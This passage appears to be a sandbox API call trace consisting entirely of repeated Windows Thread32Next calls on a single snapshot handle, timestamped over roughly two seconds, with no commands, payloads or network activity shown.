lpte=0x14fe78) returned 1 [0143.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0144.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.115] Thread32Next 